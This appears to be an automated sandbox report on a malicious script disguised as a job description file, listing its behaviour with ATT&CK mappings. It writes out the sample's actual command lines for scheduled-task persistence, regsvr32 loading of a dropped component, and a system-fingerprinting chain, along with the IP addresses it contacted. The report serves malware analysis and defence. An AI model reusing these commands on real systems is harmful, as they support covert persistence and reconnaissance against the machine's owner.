Job Description.wsf
This report is generated from a file or URL submitted to this webservice on December 19th 2019 21:17:09 (UTC)
Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Spyware
- Hooks API calls
- Persistence
-
Schedules a task to be executed at a specific time and date
Spawns a lot of processes - Fingerprint
-
Detected network related fingerprinting/snooping attempt
Queries kernel debugger information
Queries sensitive IE security settings
Reads system information using Windows Management Instrumentation Commandline (WMIC)
Reads the active computer name
Reads the cryptographic machine GUID - Evasive
- Marks file for deletion
- Spreading
- Opens the MountPointManager (often used to detect additional infection locations)
- Network Behavior
- Contacts 2 domains and 2 hosts. View all details
MITRE ATT&CK™ Techniques Detection
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 6
-
External Systems
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 1/59 Antivirus vendors marked sample as malicious (1% detection rate)
- source
- External System
- relevance
- 8/10
-
Sample was identified as malicious by at least one Antivirus engine
-
Installation/Persistance
-
Schedules a task to be executed at a specific time and date
- details
-
Process "schtasks.exe" with commandline "/Delete /F /TN "912F8A0F793"" (Show Process)
Process "schtasks.exe" with commandline "/Create /TN "912F8A0F793" /XML "%ALLUSERSPROFILE%\Microsoft\1B2FFE2276368908.txt"" (Show Process) - source
- Monitored Target
- relevance
- 8/10
- ATT&CK ID
- T1168 (Show technique in the MITRE ATT&CK™ matrix)
-
Schedules a task to be executed at a specific time and date
-
Spyware/Information Retrieval
-
Detected network related fingerprinting/snooping attempt
- details
- Process "ipconfig.exe" with commandline "" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
- ATT&CK ID
- T1087 (Show technique in the MITRE ATT&CK™ matrix)
-
Detected network related fingerprinting/snooping attempt
-
Unusual Characteristics
-
References suspicious system modules
- details
-
""System Idle Process","0","Services","0","12 K"
"System","4","Services","0","728 K"
"smss.exe","264","Services","0","812 K"
"csrss.exe","340","Services","0","3
376 K"
"csrss.exe","388","Console","1","7
988 K"
"wininit.exe","396","Services","0","3
296 K"
"winlogon.exe","436","Console","1","5
380 K"
"services.exe","484","Services","0","6
932 K"
"lsass.exe","492","Services","0","8
540 K"
"lsm.exe","500","Services","0","3
044 K"
"svchost.exe","604","Services","0","6
908 K"
"svchost.exe","728","Services","0","6
464 K"
"svchost.exe","812","Services","0","17
320 K"
"svchost.exe","852","Services","0","10
452 K"
"svchost.exe","876","Services","0","13
784 K"
"svchost.exe","928","Services","0","22
552 K"
"svchost.exe","1152","Services","0","11
436 K"
"spoolsv.exe","1288","Services","0","8
872 K"
"svchost.exe","1320","Services","0","12
144 K"
"taskhost.exe","1496","Console","1","22
384 K"
"dwm.exe","1640","Console","1","4
936 K"
"svchost.exe","996","Services","0","4
676 K"
"svchost.exe","2220","Services","0","9
604 K"
"svchost.exe","2352","Services","0","6
332 K"
"WmiPrvSE.exe","2704","Services","0","4
956 K"
"WmiPrvSE.exe","3220","Services","0","9
972 K"
"explorer.exe","2552","Console","1","31
104 K"
"conhost.exe","3884","Console","1","3
724 K"
"conhost.exe","3400","Console","1","3
704 K"
"conhost.exe","3868","Console","1","3
712 K"
"WINWORD.EXE","3104","Console","1","60
316 K"
"svchost.exe","1700","Services","0","2
020 K"
"msiexec.exe","1924","Services","0","12
024 K"
"OSPPSVC.EXE","2264","Services","0","132 K"
"msxsl.exe","2028","Console","1","33
480 K"
"conhost.exe","1392","Console","1","3
760 K"
"cmd.exe","172","Console","1","2
576 K"
"conhost.exe","3572","Console","1","3
768 K"
"OSPPSVC.EXE","3752","Services","0","132 K"
"dllhost.exe","2184","Services","0","3
436 K"
"tasklist.exe","3588","Console","1","4
356 K""
""csrss.exe","340","Services","0","3
376 K""
""csrss.exe","388","Console","1","7
988 K""
""lsass.exe","492","Services","0","8
540 K"" - source
- File/Memory
- relevance
- 5/10
- ATT&CK ID
- T1215 (Show technique in the MITRE ATT&CK™ matrix)
-
Script connects to a host without prior DNS lookup
- details
-
Process "wscript.exe" connected to "205.185.216.10" (Port: 49310, Protocol: TCP) without a DNS lookup
Process "wscript.exe" connected to "151.139.128.14" (Port: 49311, Protocol: TCP) without a DNS lookup - source
- Monitored Target
- relevance
- 10/10
-
Spawns a lot of processes
- details
-
Spawned process "wscript.exe" with commandline ""C:\JobDescription.wsf"" (Show Process)
Spawned process "WINWORD.EXE" with commandline ""%APPDATA%\Microsoft\21152.doc"" (Show Process)
Spawned process "regsvr32.exe" with commandline "/s /i "%APPDATA%\Microsoft\40070.ocx"" (Show Process)
Spawned process "schtasks.exe" with commandline "/Delete /F /TN "912F8A0F793"" (Show Process)
Spawned process "schtasks.exe" with commandline "/Create /TN "912F8A0F793" /XML "%ALLUSERSPROFILE%\Microsoft\1B2FFE2276368908.txt"" (Show Process)
Spawned process "msxsl.exe" with commandline "8CDAF1CED822.txt 8CDAF1CED822.txt" (Show Process)
Spawned process "cmd.exe" with commandline "/c del "%APPDATA%\Microsoft\40070.ocx" >> NUL" (Show Process)
Spawned process "cmd.exe" with commandline "/c wmic path win32_Operatingsystem get SerialNumber /FORMAT:Textvaluelist | findstr /R /C:"SerialNumber=" > "%TEMP%\55356.txt" & vol C: > "%TEMP%\8785.txt" & wmic csproduct get Name /FORMAT:Textvaluelist | findstr /R /C:"Name=" > "%TEMP%\23030.txt" & tasklist /FO CSV /NH > "%TEMP%\4254.txt" & ver > "%TEMP%\24760.txt" & wmic os get ProductType /FORMAT:Textvaluelist | findstr /R /C:"ProductType=" > "%TEMP%\1931.txt" & ipconfig | findstr /R /C:"IPv4 Address" > "%TEMP%\16406.txt"" (Show Process)
Spawned process "WMIC.exe" with commandline "wmic path win32_Operatingsystem get SerialNumber /FORMAT:Textvaluelist" (Show Process)
Spawned process "findstr.exe" with commandline "findstr /R /C:"SerialNumber="" (Show Process)
Spawned process "WMIC.exe" with commandline "wmic csproduct get Name /FORMAT:Textvaluelist" (Show Process)
Spawned process "findstr.exe" with commandline "findstr /R /C:"Name="" (Show Process)
Spawned process "tasklist.exe" with commandline "tasklist /FO CSV /NH" (Show Process)
Spawned process "WMIC.exe" with commandline "wmic os get ProductType /FORMAT:Textvaluelist" (Show Process)
Spawned process "findstr.exe" with commandline "findstr /R /C:"ProductType="" (Show Process)
Spawned process "ipconfig.exe" (Show Process)
Spawned process "findstr.exe" with commandline "findstr /R /C:"IPv4 Address"" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
References suspicious system modules
-
Suspicious Indicators 23
-
Anti-Detection/Stealthyness
-
Queries kernel debugger information
- details
-
"WINWORD.EXE" at 00022568-00003104-00000105-34039744857
"msxsl.exe" at 00031242-00002028-00000105-321099927823
"WMIC.exe" at 00031840-00003556-00000105-335215049603
"WMIC.exe" at 00032177-00003316-00000105-346239207505
"tasklist.exe" at 00032512-00003588-00000105-337547491084
"WMIC.exe" at 00032610-00001140-00000105-359848251776 - source
- API Call
- relevance
- 6/10
-
Queries kernel debugger information
-
Environment Awareness
-
Queries the installation properties of user installed products
- details
-
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004119210000000000000000F01FEC\INSTALLPROPERTIES")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004119210000000000000000F01FEC\INSTALLPROPERTIES"; Key: "WINDOWSINSTALLER"; Value: "00000000040000000400000001000000") - source
- Registry Access
- relevance
- 10/10
-
Reads the active computer name
- details
-
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"schtasks.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"msxsl.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"WMIC.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"tasklist.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"ipconfig.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME") - source
- Registry Access
- relevance
- 5/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads the cryptographic machine GUID
- details
-
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"WMIC.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"tasklist.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Queries the installation properties of user installed products
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
- 1/72 reputation engines marked "http://crt.sectigo.com" as malicious (1% detection rate)
- source
- External System
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
-
General
-
Opened the service control manager
- details
-
"wscript.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
"wscript.exe" called "OpenSCManager" requesting access rights "0XE0000000L"
"WINWORD.EXE" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1) - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1035 (Show technique in the MITRE ATT&CK™ matrix)
-
Removes Office resiliency keys (often used to avoid problems opening documents)
- details
-
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "+<L")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: ",.M")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: ")7L"), "WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Opened the service control manager
-
Installation/Persistance
-
Allocates virtual memory in a remote process
- details
-
"wscript.exe" allocated memory in "\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap"
"regsvr32.exe" allocated memory in "%ALLUSERSPROFILE%\Microsoft\msxsl.exe" - source
- API Call
- relevance
- 7/10
- ATT&CK ID
- T1055 (Show technique in the MITRE ATT&CK™ matrix)
-
Writes data to a remote process
- details
-
"wscript.exe" wrote 4 bytes to a remote process "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" (Handle: 1320)
"wscript.exe" wrote 32 bytes to a remote process "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" (Handle: 1320)
"wscript.exe" wrote 52 bytes to a remote process "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" (Handle: 1320)
"wscript.exe" wrote 4 bytes to a remote process "C:\Windows\System32\regsvr32.exe" (Handle: 1328)
"wscript.exe" wrote 1500 bytes to a remote process "C:\Windows\System32\regsvr32.exe" (Handle: 1328)
"wscript.exe" wrote 32 bytes to a remote process "C:\Windows\System32\regsvr32.exe" (Handle: 1328)
"wscript.exe" wrote 52 bytes to a remote process "C:\Windows\System32\regsvr32.exe" (Handle: 1328)
"regsvr32.exe" wrote 32 bytes to a remote process "C:\Windows\System32\schtasks.exe" (Handle: 288)
"regsvr32.exe" wrote 52 bytes to a remote process "C:\Windows\System32\schtasks.exe" (Handle: 288)
"regsvr32.exe" wrote 4 bytes to a remote process "C:\Windows\System32\schtasks.exe" (Handle: 288)
"regsvr32.exe" wrote 32 bytes to a remote process "C:\Windows\System32\schtasks.exe" (Handle: 292)
"regsvr32.exe" wrote 52 bytes to a remote process "C:\Windows\System32\schtasks.exe" (Handle: 292)
"regsvr32.exe" wrote 4 bytes to a remote process "C:\Windows\System32\schtasks.exe" (Handle: 292)
"regsvr32.exe" wrote 32 bytes to a remote process "%ALLUSERSPROFILE%\Microsoft\msxsl.exe" (Handle: 288)
"regsvr32.exe" wrote 52 bytes to a remote process "C:\ProgramData\Microsoft\msxsl.exe" (Handle: 288)
"regsvr32.exe" wrote 4 bytes to a remote process "C:\ProgramData\Microsoft\msxsl.exe" (Handle: 288)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 100)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 100)
"cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\wbem\WMIC.exe" (Handle: 80)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\wbem\WMIC.exe" (Handle: 80)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\wbem\WMIC.exe" (Handle: 80)
"cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 108)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 108)
"cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\wbem\WMIC.exe" (Handle: 92)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\wbem\WMIC.exe" (Handle: 92)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\wbem\WMIC.exe" (Handle: 92)
"cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 100)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 108)
"cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\ipconfig.exe" (Handle: 108)
"cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\tasklist.exe" (Handle: 88)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\tasklist.exe" (Handle: 88)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\tasklist.exe" (Handle: 88)
"cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 116)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 116)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 116)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\ipconfig.exe" (Handle: 108)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\ipconfig.exe" (Handle: 108)
"cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 84)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 84)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 84) - source
- API Call
- relevance
- 6/10
- ATT&CK ID
- T1055 (Show technique in the MITRE ATT&CK™ matrix)
-
Allocates virtual memory in a remote process
-
Network Related
-
Sends traffic on typical HTTP outbound port, but without HTTP header
- details
-
TCP traffic to 18.222.173.108 on port 443 is sent without HTTP header
TCP traffic to 91.199.212.52 on port 80 is sent without HTTP header - source
- Network Traffic
- relevance
- 5/10
-
Sends traffic on typical HTTP outbound port, but without HTTP header
-
Spyware/Information Retrieval
-
Reads system information using Windows Management Instrumentation Commandline (WMIC)
- details
-
Process "WMIC.exe" with commandline "wmic path win32_Operatingsystem get SerialNumber /FORMAT:Textvaluelist" (Show Process)
Process "WMIC.exe" with commandline "wmic csproduct get Name /FORMAT:Textvaluelist" (Show Process)
Process "WMIC.exe" with commandline "wmic os get ProductType /FORMAT:Textvaluelist" (Show Process) - source
- Monitored Target
- relevance
- 3/10
- ATT&CK ID
- T1047 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads system information using Windows Management Instrumentation Commandline (WMIC)
-
System Destruction
-
Marks file for deletion
- details
-
"%PROGRAMFILES%\MICROS~3\Office14\WINWORD.EXE" marked "%APPDATA%\Microsoft\Office\Recent\21152.LNK" for deletion
"%ALLUSERSPROFILE%\Microsoft\msxsl.exe" marked "%TEMP%\55356.txt" for deletion
"%ALLUSERSPROFILE%\Microsoft\msxsl.exe" marked "C:\Users\%USERNAME%\AppData\Local\Temp\8785.txt" for deletion
"%ALLUSERSPROFILE%\Microsoft\msxsl.exe" marked "C:\Users\%USERNAME%\AppData\Local\Temp\23030.txt" for deletion
"%ALLUSERSPROFILE%\Microsoft\msxsl.exe" marked "C:\Users\%USERNAME%\AppData\Local\Temp\24760.txt" for deletion
"%ALLUSERSPROFILE%\Microsoft\msxsl.exe" marked "C:\Users\%USERNAME%\AppData\Local\Temp\1931.txt" for deletion
"%ALLUSERSPROFILE%\Microsoft\msxsl.exe" marked "C:\Users\%USERNAME%\AppData\Local\Temp\16406.txt" for deletion
"%ALLUSERSPROFILE%\Microsoft\msxsl.exe" marked "C:\Users\%USERNAME%\AppData\Local\Temp\4254.txt" for deletion - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1107 (Show technique in the MITRE ATT&CK™ matrix)
-
Opens file with deletion access rights
- details
-
"WINWORD.EXE" opened "%APPDATA%\Microsoft\Office\Recent\21152.LNK" with delete access
"WINWORD.EXE" opened "%TEMP%\CVR6CFA.tmp" with delete access
"WINWORD.EXE" opened "C:\Users\%USERNAME%\AppData\Local\Microsoft\Schemas\MS Word_restart.xml" with delete access
"msxsl.exe" opened "C:\Users\%USERNAME%\AppData\Local\Temp\55356.txt" with delete access
"msxsl.exe" opened "C:\Users\%USERNAME%\AppData\Local\Temp\8785.txt" with delete access
"msxsl.exe" opened "C:\Users\%USERNAME%\AppData\Local\Temp\23030.txt" with delete access
"msxsl.exe" opened "C:\Users\%USERNAME%\AppData\Local\Temp\24760.txt" with delete access
"msxsl.exe" opened "C:\Users\%USERNAME%\AppData\Local\Temp\1931.txt" with delete access
"msxsl.exe" opened "C:\Users\%USERNAME%\AppData\Local\Temp\16406.txt" with delete access
"msxsl.exe" opened "C:\Users\%USERNAME%\AppData\Local\Temp\4254.txt" with delete access - source
- API Call
- relevance
- 7/10
-
Marks file for deletion
-
System Security
-
Hooks API calls
- details
-
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Modifies System Certificates Settings
- details
-
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES"; Key: "2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E")
"wscript.exe" (Access type: "SETVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E"; Key: "BLOB")
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES"; Key: "0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43")
"wscript.exe" (Access type: "SETVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43"; Key: "BLOB")
"msxsl.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES"; Key: "2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E")
"msxsl.exe" (Access type: "SETVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E"; Key: "BLOB")
"msxsl.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "33E4E80807204C2B6182A3A14B591ACD25B5F0DB")
"msxsl.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\33E4E80807204C2B6182A3A14B591ACD25B5F0DB"; Key: "BLOB") - source
- Registry Access
- relevance
- 8/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Queries sensitive IE security settings
- details
-
"WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK") - source
- Registry Access
- relevance
- 8/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Hooks API calls
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"wscript.exe" wrote bytes "c04e767720547777e0657777b53878770000000000d09b7500000000c5ea9b750000000088ea9b7500000000e9687d7582287877ee29787700000000d2697d75000000007dbb9b750000000009be7d7500000000ba189b7500000000" to virtual address "0x77131000" (part of module "NSI.DLL")
"wscript.exe" wrote bytes "fae67377e1a678772e717877ee29787785e273776da0787726e47377d16d7877003d7677804b767700000000ad3715768b2d1576b641157600000000" to virtual address "0x74AC1000" (part of module "WSHTCPIP.DLL")
"wscript.exe" wrote bytes "e7397477e1a678772e717877ee29787785e273776da07877906477773ad57e7726e47377d16d7877003d7677804b767700000000ad3715768b2d1576b641157600000000" to virtual address "0x74FF1000" (part of module "WSHIP6.DLL")
"WINWORD.EXE" wrote bytes "e9848ea3ef" to virtual address "0x759BF71B" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "f8110000" to virtual address "0x754C12CC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "85498fe7" to virtual address "0x666578E4" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "f8114c75" to virtual address "0x754D834C" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "f8110000" to virtual address "0x754C1408" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "b84013fd70ffe0" to virtual address "0x754C1248" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48124c75" to virtual address "0x754D8348" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "f8114c75" to virtual address "0x754D83C4" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "9f28bee7" to virtual address "0x65650BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "48124c75" to virtual address "0x754D83C0" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "d5d99b7530c69b75e0c29b7542c69b7510c69b75acdc9b75a0df9b7536da9b7587f19b750000000091778877c09088777f6f88771ffa8877def48877f2828877857d887700000000" to virtual address "0x6FD01000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "48120000" to virtual address "0x754C139C" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48120000" to virtual address "0x754C12DC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48124c75" to virtual address "0x754D83DC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "c04e767720547777e0657777b53878770000000000d09b7500000000c5ea9b750000000088ea9b7500000000e9687d7582287877ee29787700000000d2697d75000000007dbb9b750000000009be7d7500000000ba189b7500000000" to virtual address "0x77131000" (part of module "NSI.DLL")
"WINWORD.EXE" wrote bytes "43188ae7" to virtual address "0x6C24CA70" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "68130000" to virtual address "0x76151680" (part of module "WS2_32.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads information about supported languages
- details
-
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000401")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040D")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000041E")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000042A")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000439")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000420")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000429")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000402")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000403")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000404")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000405")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000406")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000407")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000408")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040A") - source
- Registry Access
- relevance
- 3/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Installs hooks/patches the running process
-
Hiding 5 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 37
-
Anti-Detection/Stealthyness
-
Queries process information
- details
-
"regsvr32.exe" queried SystemProcessInformation at 00023458-00003904-00000105-296999971091
"regsvr32.exe" queried SystemProcessInformation at 00023458-00003904-00000105-297001254329
"regsvr32.exe" queried SystemProcessInformation at 00023458-00003904-00000105-298512011061
"regsvr32.exe" queried SystemProcessInformation at 00023458-00003904-00000105-298513398868 - source
- API Call
- relevance
- 4/10
- ATT&CK ID
- T1057 (Show technique in the MITRE ATT&CK™ matrix)
-
Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
- details
- "msxsl.exe" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
- source
- Registry Access
- relevance
- 3/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Queries process information
-
Environment Awareness
-
Executes WMI queries
- details
-
"WMIC.exe" issued a query "SELECT SerialNumber FROM win32_Operatingsystem"
"WMIC.exe" issued a query "SELECT Name FROM Win32_ComputerSystemProduct"
"WMIC.exe" issued a query "SELECT ProductType FROM Win32_OperatingSystem" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1047 (Show technique in the MITRE ATT&CK™ matrix)
-
Executes WMI queries known to be used for VM detection
- details
- "WMIC.exe" issued a query "SELECT Name FROM Win32_ComputerSystemProduct"
- source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1047 (Show technique in the MITRE ATT&CK™ matrix)
-
Queries volume information
- details
-
"WINWORD.EXE" queries volume information of "C:\" at 00022568-00003104-0000010C-38463179726
"WINWORD.EXE" queries volume information of "%APPDATA%\Microsoft\21152.doc" at 00022568-00003104-0000010C-38490489432
"WINWORD.EXE" queries volume information of "C:\" at 00022568-00003104-0000010C-47149069228
"WINWORD.EXE" queries volume information of "%APPDATA%\Microsoft\21152.doc" at 00022568-00003104-0000010C-47153241500
"WINWORD.EXE" queries volume information of "%APPDATA%\Microsoft\UProof\CUSTOM.DIC" at 00022568-00003104-0000010C-63594602987
"WINWORD.EXE" queries volume information of "%APPDATA%\Microsoft\UProof\CUSTOM.DIC" at 00022568-00003104-0000010C-63595983163 - source
- API Call
- relevance
- 2/10
- ATT&CK ID
- T1120 (Show technique in the MITRE ATT&CK™ matrix)
-
Queries volume information of an entire harddrive
- details
-
